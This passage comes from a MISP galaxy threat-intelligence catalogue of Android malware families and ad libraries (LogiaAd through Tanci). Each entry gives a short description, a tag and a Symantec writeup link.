The tag is: misp-galaxy:android="LogiaAd"

Table 237. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-052713-0348-99

Loicdos

Loicdos is an Android application that provides an interface to a website in order to perform a denial of service (DoS) attack against a computer.

The tag is: misp-galaxy:android="Loicdos"

Table 238. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-022002-2431-99

Loozfon

Loozfon is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Loozfon"

Table 239. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-082005-5451-99

Lotoor

Lotoor is a generic detection for hack tools that exploit vulnerabilities in order to gain root privileges on compromised Android devices.

The tag is: misp-galaxy:android="Lotoor"

Table 240. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-091922-4449-99

Lovespy

Lovespy is a Trojan horse for Android devices that steals information from the device.

The tag is: misp-galaxy:android="Lovespy"

Table 241. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-071814-3805-99

Lovetrap

Lovetrap is a Trojan horse that sends SMS messages to premium-rate phone numbers.

The tag is: misp-galaxy:android="Lovetrap"

Table 242. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-072806-2905-99

Luckycat

Luckycat is a Trojan horse for Android devices that opens a back door and steals information on the compromised device.

The tag is: misp-galaxy:android="Luckycat"

Table 243. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-080617-5343-99

Machinleak

Machinleak is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Machinleak"

Table 244. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-120311-2440-99

Maistealer

Maistealer is a Trojan that steals information from Android devices.

The tag is: misp-galaxy:android="Maistealer"

Table 245. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-072411-4350-99

Malapp

Malapp is a generic detection for many individual but varied threats on Android devices that share similar characteristics.

The tag is: misp-galaxy:android="Malapp"

Table 246. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-073014-3354-99

Malebook

Malebook is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Malebook"

Table 247. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-071206-3403-99

Malhome

Malhome is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Malhome"

Table 248. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-071118-0441-99

Malminer

Malminer is a Trojan horse for Android devices that mines cryptocurrencies on the compromised device.

The tag is: misp-galaxy:android="Malminer"

Table 249. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-032712-3709-99

Mania

Mania is a Trojan horse for Android devices that sends SMS messages to a premium-rate phone number.

The tag is: misp-galaxy:android="Mania"

Table 250. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-070623-1520-99

Maxit

Maxit is a Trojan horse for Android devices that opens a back door on the compromised device. It also steals certain information and uploads it to a remote location.

The tag is: misp-galaxy:android="Maxit"

Table 251. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-120411-2511-99

MdotM

MdotM is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="MdotM"

Table 252. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-5824-99

Medialets

Medialets is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Medialets"

Table 253. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-5222-99

Meshidden

Meshidden is a spyware application for Android devices that allows the device it is installed on to be monitored.

The tag is: misp-galaxy:android="Meshidden"

Table 254. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-031913-5257-99

Mesploit

Mesploit is a tool for Android devices used to create applications that exploit the Android Fake ID vulnerability.

The tag is: misp-galaxy:android="Mesploit"

Table 255. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2015-032014-2847-99

Mesprank

Mesprank is a Trojan horse for Android devices that opens a back door on the compromised device.

The tag is: misp-galaxy:android="Mesprank"

Table 256. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-030717-1933-99

Meswatcherbox

Meswatcherbox is a spyware application for Android devices that forwards SMS messages without the user knowing.

The tag is: misp-galaxy:android="Meswatcherbox"

Table 257. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-111612-2736-99

Miji

Miji is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Miji"

Table 258. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-032815-4720-99

Milipnot

Milipnot is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Milipnot"

Table 259. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-070414-0941-99

MillennialMedia

MillennialMedia is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="MillennialMedia"

Table 260. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-4602-99

Mitcad

Mitcad is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Mitcad"

Table 261. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040212-0528-99

MobClix

MobClix is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="MobClix"

Table 262. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-4011-99

MobFox

MobFox is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="MobFox"

Table 263. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-3050-99

Mobidisplay

Mobidisplay is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Mobidisplay"

Table 264. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040312-0435-99

Mobigapp

Mobigapp is a Trojan horse for Android devices that downloads applications disguised as system updates.

The tag is: misp-galaxy:android="Mobigapp"

Table 265. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-062520-5802-99

MobileBackup

MobileBackup is a spyware application for Android devices that monitors the affected device.

The tag is: misp-galaxy:android="MobileBackup"

Table 266. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-031020-0040-99

Mobilespy

Mobilespy is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Mobilespy"

Table 267. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-071512-0653-99

Mobiletx

Mobiletx is a Trojan horse for Android devices that steals information from the compromised device. It may also send SMS messages to a premium-rate number.

The tag is: misp-galaxy:android="Mobiletx"

Table 268. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-052807-4439-99

Mobinaspy

Mobinaspy is a spyware application for Android devices that can track the device’s location.

The tag is: misp-galaxy:android="Mobinaspy"

Table 269. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-111516-0511-99

Mobus

Mobus is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Mobus"

Table 270. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-2006-99

MobWin

MobWin is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="MobWin"

Table 271. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-1522-99

Mocore

Mocore is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Mocore"

Table 272. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2015-092112-4603-99

Moghava

Moghava is a Trojan horse for Android devices that modifies images that are stored on the device.

The tag is: misp-galaxy:android="Moghava"

Table 273. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-022712-2822-99

Momark

Momark is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Momark"

Table 274. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040113-5529-99

Monitorello

Monitorello is a spyware application for Android devices that allows the device it is installed on to be monitored.

The tag is: misp-galaxy:android="Monitorello"

Table 275. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-031914-4737-99

Moolah

Moolah is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Moolah"

Table 276. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-1007-99

MoPub

MoPub is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="MoPub"

Table 277. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-2456-99

Morepaks

Morepaks is a Trojan horse for Android devices that downloads remote files and may display advertisements on the compromised device.

The tag is: misp-galaxy:android="Morepaks"

Table 278. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-071204-1130-99

Nandrobox

Nandrobox is a Trojan horse for Android devices that steals information from the compromised device. It also deletes certain SMS messages from the device.

The tag is: misp-galaxy:android="Nandrobox"

Table 279. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-070212-2132-99

Netisend

Netisend is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Netisend"

Table 280. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-080207-1139-99

Nickispy

Nickispy is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Nickispy"

Table 281. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-072714-3613-99

Notcompatible

Notcompatible is a Trojan horse for Android devices that acts as a proxy.

The tag is: misp-galaxy:android="Notcompatible"

Table 282. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-050307-2712-99

Nuhaz

Nuhaz is a Trojan horse for Android devices that may intercept text messages on the compromised device.

The tag is: misp-galaxy:android="Nuhaz"

Table 283. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-031814-3416-99

Nyearleaker

Nyearleaker is a Trojan horse program for Android devices that steals information.

The tag is: misp-galaxy:android="Nyearleaker"

Table 284. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-010514-0844-99

Obad

Obad is a Trojan horse for Android devices that opens a back door, steals information, and downloads files. It also sends SMS messages to premium-rate numbers and spreads malware to Bluetooth-enabled devices.

The tag is: misp-galaxy:android="Obad"

Table 285. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-060411-4146-99

Oneclickfraud

Oneclickfraud is a Trojan horse for Android devices that attempts to coerce a user into paying for a pornographic service.

The tag is: misp-galaxy:android="Oneclickfraud"

Table 286. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-011205-4412-99

Opfake

Opfake is a detection for Trojan horses on the Android platform that send SMS texts to premium-rate numbers.

The tag is: misp-galaxy:android="Opfake"

Table 287. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-012709-2732-99

Opfake.B

Opfake.B is a Trojan horse for the Android platform that may receive commands from a remote attacker to perform various functions.

The tag is: misp-galaxy:android="Opfake.B"

Table 288. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-022406-1309-99

Ozotshielder

Ozotshielder is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Ozotshielder"

Table 289. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-091505-3230-99

Pafloat

Pafloat is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Pafloat"

Table 290. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040215-2015-99

PandaAds

PandaAds is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="PandaAds"

Table 291. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040312-1959-99

Pandbot

Pandbot is a Trojan horse for Android devices that may download more files onto the device.

The tag is: misp-galaxy:android="Pandbot"

Table 292. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-071215-1454-99

Pdaspy

Pdaspy is a spyware application for Android devices that periodically gathers information from the device and uploads it to a predetermined location.

The tag is: misp-galaxy:android="Pdaspy"

Table 293. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-111612-0749-99

Penetho

Penetho is a hacktool for Android devices that can be used to crack the WiFi password of the router that the device is using.

The tag is: misp-galaxy:android="Penetho"

Table 294. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-100110-3614-99

Perkel

Perkel is a Trojan horse for Android devices that may steal information from the compromised device.

The tag is: misp-galaxy:android="Perkel"

Table 295. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-082811-4213-99

Phimdropper

Phimdropper is a Trojan horse for Android devices that sends and intercepts incoming SMS messages.

The tag is: misp-galaxy:android="Phimdropper"

Table 296. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-021002-2943-99

Phospy

Phospy is a Trojan horse for Android devices that steals confidential information from the compromised device.

The tag is: misp-galaxy:android="Phospy"

Table 297. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-060706-4803-99

Piddialer

Piddialer is a Trojan horse for Android devices that dials premium-rate numbers from the compromised device.

The tag is: misp-galaxy:android="Piddialer"

Table 298. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-111020-2247-99

Pikspam

Pikspam is a Trojan horse for Android devices that sends spam SMS messages from the compromised device.

The tag is: misp-galaxy:android="Pikspam"

Table 299. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-121815-0336-99

Pincer

Pincer is a Trojan horse for Android devices that steals confidential information and opens a back door on the compromised device.

The tag is: misp-galaxy:android="Pincer"

Table 300. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-052307-3530-99

Pirator

Pirator is a Trojan horse on the Android platform that downloads files and steals potentially confidential information from the compromised device.

The tag is: misp-galaxy:android="Pirator"

Table 301. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-021609-5740-99

Pjapps

Pjapps is a Trojan horse that has been embedded on third party applications and opens a back door on the compromised device. It retrieves commands from a remote command and control server.

The tag is: misp-galaxy:android="Pjapps"

Table 302. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-022303-3344-99

Pjapps.B

Pjapps.B is a Trojan horse for Android devices that opens a back door on the compromised device.

The tag is: misp-galaxy:android="Pjapps.B"

Table 303. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-032014-1624-99

Pletora

Pletora is a is a Trojan horse for Android devices that may lock the compromised device. It then asks the user to pay in order to unlock the device.

The tag is: misp-galaxy:android="Pletora"

Table 304. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-061217-4345-99

Poisoncake

Poisoncake is a Trojan horse for Android devices that opens a back door on the compromised device. It may also download potentially malicious files and steal information.

The tag is: misp-galaxy:android="Poisoncake"

Table 305. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2015-010610-0726-99

Pontiflex

Pontiflex is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Pontiflex"

Table 306. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-052618-0946-99

Positmob

Positmob is a Trojan horse program for Android devices that sends SMS messages to premium rate phone numbers.

The tag is: misp-galaxy:android="Positmob"

Table 307. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-111409-1556-99

Premiumtext

Premiumtext is a detection for Trojan horses on the Android platform that send SMS texts to premium-rate numbers. These Trojans will often be repackaged versions of genuine Android software packages, often distributed outside the Android Marketplace.

The tag is: misp-galaxy:android="Premiumtext"

Table 308. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-080213-5308-99

Pris

Pris is a Trojan horse for Android devices that silently downloads a malicious application and attempts to open a back door on the compromised device.

The tag is: misp-galaxy:android="Pris"

Table 309. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-061820-5638-99

Qdplugin

Qdplugin is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Qdplugin"

Table 310. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-102510-3330-99

Qicsomos

Qicsomos is a Trojan horse for Android devices that sends SMS messages to a premium-rate phone number.

The tag is: misp-galaxy:android="Qicsomos"

Table 311. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-011007-2223-99

Qitmo

Qitmo is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Qitmo"

Table 312. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-030716-4923-99

Rabbhome

Rabbhome is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Rabbhome"

Table 313. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-053007-3750-99

Repane

Repane is a Trojan horse for Android devices that steals information and sends SMS messages from the compromised device.

The tag is: misp-galaxy:android="Repane"

Table 314. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-090411-5052-99

Reputation.1

Reputation.1 is a detection for Android files based on analysis performed by Norton Mobile Insight.

The tag is: misp-galaxy:android="Reputation.1"

Table 315. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-022612-2619-99

Reputation.2

Reputation.2 is a detection for Android files based on analysis performed by Norton Mobile Insight.

The tag is: misp-galaxy:android="Reputation.2"

Table 316. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-022613-2629-99

Reputation.3

Reputation.3 is a detection for Android files based on analysis performed by Norton Mobile Insight.

The tag is: misp-galaxy:android="Reputation.3"

Table 317. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-022613-3126-99

RevMob

RevMob is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="RevMob"

Table 318. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040308-0502-99

Roidsec

Roidsec is a Trojan horse for Android devices that steals confidential information.

The tag is: misp-galaxy:android="Roidsec"

Table 319. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-052022-1227-99

Rootcager

Rootcager is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Rootcager"

Table 320. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-030212-1438-99

Rootnik

Rootnik is a Trojan horse for Android devices that steals information and downloads additional apps.

The tag is: misp-galaxy:android="Rootnik"

View relationships graph

Rootnik has relationships with:

similar: misp-galaxy:malpedia="Rootnik" with estimative-language:likelihood-probability="likely"

Table 321. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2016-062710-0328-99

Rufraud

Rufraud is a Trojan horse for Android devices that sends SMS messages to premium-rate phone numbers.

The tag is: misp-galaxy:android="Rufraud"

Table 322. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-121306-2304-99

Rusms

Rusms is a Trojan horse for Android devices that sends SMS messages and steals information from the compromised device.

The tag is: misp-galaxy:android="Rusms"

Table 323. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-061711-5009-99

Samsapo

Samsapo is a worm for Android devices that spreads by sending SMS messages to all contacts stored on the compromised device. It also opens a back door and downloads files.

The tag is: misp-galaxy:android="Samsapo"

Table 324. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-050111-1908-99

Sandorat

Sandorat is a Trojan horse for Android devices that opens a back door on the compromised device. It also steals information.

The tag is: misp-galaxy:android="Sandorat"

Table 325. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-110720-2146-99

Sberick

Sberick is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Sberick"

Table 326. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-071014-2146-99

Scartibro

Scartibro is a Trojan horse for Android devices that locks the compromised device and asks the user to pay in order to unlock it.

The tag is: misp-galaxy:android="Scartibro"

Table 327. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-080718-2038-99

Scipiex

Scipiex is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Scipiex"

Table 328. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-100814-4702-99

Selfmite

Selfmite is a worm for Android devices that spreads through SMS messages.

The tag is: misp-galaxy:android="Selfmite"

Table 329. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-070111-5857-99

Selfmite.B

Selfmite.B is a worm for Android devices that displays ads on the compromised device. It spreads through SMS messages.

The tag is: misp-galaxy:android="Selfmite.B"

Table 330. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-101013-4717-99

SellARing

SellARing is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="SellARing"

Table 331. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040407-3157-99

SendDroid

SendDroid is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="SendDroid"

Table 332. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040311-2111-99

Simhosy

Simhosy is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Simhosy"

Table 333. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-061013-3955-99

Simplocker

Simplocker is a Trojan horse for Android devices that may encrypt files on the compromised device. It then asks the user to pay in order to decrypt these files.

The tag is: misp-galaxy:android="Simplocker"

Table 334. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-060610-5533-99

Simplocker.B

Simplocker.B is a Trojan horse for Android devices that may encrypt files on the compromised device. It then asks the user to pay in order to decrypt these files.

The tag is: misp-galaxy:android="Simplocker.B"

Table 335. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-072317-1950-99

Skullkey

Skullkey is a Trojan horse for Android devices that gives the attacker remote control of the compromised device to perform malicious activity.

The tag is: misp-galaxy:android="Skullkey"

Table 336. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-072322-5422-99

Smaato

Smaato is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Smaato"

Table 337. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-052622-1755-99

Smbcheck

Smbcheck is a hacktool for Android devices that can trigger a Server Message Block version 2 (SMBv2) vulnerability and may cause the target computer to crash.

The tag is: misp-galaxy:android="Smbcheck"

Table 338. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-032613-5634-99

Smsblocker

Smsblocker is a generic detection for threats on Android devices that block the transmission of SMS messages.

The tag is: misp-galaxy:android="Smsblocker"

Table 339. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-081607-4001-99

Smsbomber

Smsbomber is a program that can be used to send messages to contacts on the device.

The tag is: misp-galaxy:android="Smsbomber"

Table 340. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-112611-5837-99

Smslink

Smslink is a Trojan horse for Android devices that may send malicious SMS messages from the compromised device. It may also display advertisements.

The tag is: misp-galaxy:android="Smslink"

Table 341. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-112600-3035-99

Smspacem

Smspacem is a Trojan horse that may send SMS messages from Android devices.

The tag is: misp-galaxy:android="Smspacem"

Table 342. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-052310-1322-99

SMSReplicator

SMSReplicator is a spying utility that will secretly transmit incoming SMS messages to another phone of the installer’s choice.

The tag is: misp-galaxy:android="SMSReplicator"

Table 343. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2010-110214-1252-99

Smssniffer

Smssniffer is a Trojan horse that intercepts SMS messages on Android devices.

The tag is: misp-galaxy:android="Smssniffer"

Table 344. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-071108-3626-99

Smsstealer

Smsstealer is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Smsstealer"

Table 345. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-121514-0214-99

Smstibook

Smstibook is a Trojan horse that attempts to send premium-rate SMS messages to predetermined numbers.

The tag is: misp-galaxy:android="Smstibook"

Table 346. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-051207-4833-99

Smszombie

Smszombie is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Smszombie"

Table 347. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-082011-0922-99

Snadapps

Snadapps is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Snadapps"

Table 348. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-071807-3111-99

Sockbot

Sockbot is a Trojan horse for Android devices that creates a SOCKS proxy on the compromised device.

The tag is: misp-galaxy:android="Sockbot"

Table 349. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2017-101314-1353-99

Sockrat

Sockrat is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Sockrat"

View relationships graph

Sockrat has relationships with:

similar: misp-galaxy:rat="Adwind RAT" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="Adwind" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:android="Adwind" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="AdWind" with estimative-language:likelihood-probability="likely"

Table 350. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2015-110509-4646-99

Sofacy

Sofacy is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Sofacy"

View relationships graph

Sofacy has relationships with:

similar: misp-galaxy:tool="GAMEFISH" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="SOURFACE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="CORESHELL" with estimative-language:likelihood-probability="likely"

Table 351. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2017-010508-5201-99

Sosceo

Sosceo is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Sosceo"

Table 352. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040408-0609-99

Spitmo

Spitmo is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Spitmo"

Table 353. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-091407-1435-99

Spitmo.B

Spitmo.B is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Spitmo.B"

Table 354. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-030715-0445-99

Spyagent

Spyagent is a spyware application for Android devices that logs certain information and sends SMS messages to a predetermined phone number.

The tag is: misp-galaxy:android="Spyagent"

Table 355. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-090710-1836-99

Spybubble

Spybubble is a Spyware application for Android devices that logs the device’s activity and sends it to a predetermined website.

The tag is: misp-galaxy:android="Spybubble"

Table 356. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-121917-0335-99

Spydafon

Spydafon is a Potentially Unwanted Application for Android devices that monitors the affected device.

The tag is: misp-galaxy:android="Spydafon"

Table 357. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-030722-4740-99

Spymple

Spymple is a spyware application for Android devices that allows the device it is installed on to be monitored.

The tag is: misp-galaxy:android="Spymple"

Table 358. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-031914-5403-99

Spyoo

Spyoo is a spyware program for Android devices that records and sends certain information to a remote location.

The tag is: misp-galaxy:android="Spyoo"

Table 359. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-081709-0457-99

Spytekcell

Spytekcell is a spyware program for Android devices that monitors and sends certain information to a remote location.

The tag is: misp-galaxy:android="Spytekcell"

Table 360. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-121021-0730-99

Spytrack

Spytrack is a spyware program for Android devices that periodically sends certain information to a remote location.

The tag is: misp-galaxy:android="Spytrack"

Table 361. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-080109-5710-99

Spywaller

Spywaller is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Spywaller"

Table 362. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2015-121807-0203-99

Stealthgenie

Stealthgenie is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Stealthgenie"

Table 363. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-111416-1306-99

Steek

Steek is a potentially unwanted application that is placed on a download website for Android applications and disguised as popular applications.

The tag is: misp-galaxy:android="Steek"

Table 364. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-010911-3142-99

Stels

Stels is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Stels"

Table 365. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-032910-0254-99

Stiniter

Stiniter is a Trojan horse for Android devices that sends SMS messages to a premium-rate phone number.

The tag is: misp-galaxy:android="Stiniter"

Table 366. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-030903-5228-99

Sumzand

Sumzand is a Trojan horse for Android devices that steals information and sends it to a remote location.

The tag is: misp-galaxy:android="Sumzand"

Table 367. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-080308-2851-99

Sysecsms

Sysecsms is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Sysecsms"

Table 368. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-122714-5228-99

Tanci

Tanci is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Tanci"

Table 369. Table References
Links
